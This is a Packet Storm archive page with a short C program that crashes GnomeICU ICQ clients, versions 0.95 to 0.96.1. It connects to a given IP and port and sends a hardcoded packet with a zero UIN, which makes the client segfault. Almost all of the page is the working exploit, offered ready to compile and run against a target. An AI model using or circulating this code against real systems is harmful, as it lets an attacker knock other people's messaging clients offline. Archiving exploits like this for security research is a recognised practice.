GnomeICU v0.96.1 remote dos exploit. Sends a message with uin=0000000 causing a seg fault. Tested on GnomeICU 0.95->0.96.1 on RH 7.0, Slackware 8.0.
6c7a971a62cffc000b5fbfe560a6c6266cee3054efb33e5fa8c904d551d9a46d
/* gnome.icu.crash - by insulted
oh god, this is so lame again... i found out this lil dos
on gnome icu wile i was coding a small icq app...This is
fairly simple bug, when a msg with uin 0000000 is sent,
the gnome icu client can't handle it and the applet simply
seg fault.
tested on GnomeICU 0.95->0.96.1 on RH 7.0, Slackware 8.0
mail: christian.milow@mail.be
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <arpa/inet.h>
char icqmsg[]={"\x00\x00\x89\x11\x08\x04\x03\x00\xEE\x07
\x00\x00\x70\x8C\x08\x04\x01\x00\x04\x00
\x00\x00\x00\x00\xD4\x44\xDC\xEF\xD4\x44
\xDC\xEF\xA0\x0F\x00\x00\x04\x00\x00\x10
\x00\xF6\xFF\xFF\xFF"};
int main(int argc, char *argv[])
{
int sock;
struct sockaddr_in slut;
if(argc<3)
{
printf("usage: %s <ip> <port>\n",argv[0]);
printf(" default port on gicu is 4000\n");
return -1;
}
/* once upon a sock ... */
if((sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0)
{
perror("socket");
return -1;
}
slut.sin_family = AF_INET;
slut.sin_port = htons(atoi(argv[2]));
slut.sin_addr.s_addr=inet_addr(argv[1]);
if(connect(sock,(struct sockaddr *)&slut,sizeof(struct sockaddr))<0)
{
perror("connect");
return -1;
}
if(send(sock,&icqmsg,sizeof(icqmsg),0)<0)
{
perror("send");
return -1;
}
/* she lived happily ever after ... */
close(sock);
/* END - so quick, so done */
return 0;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed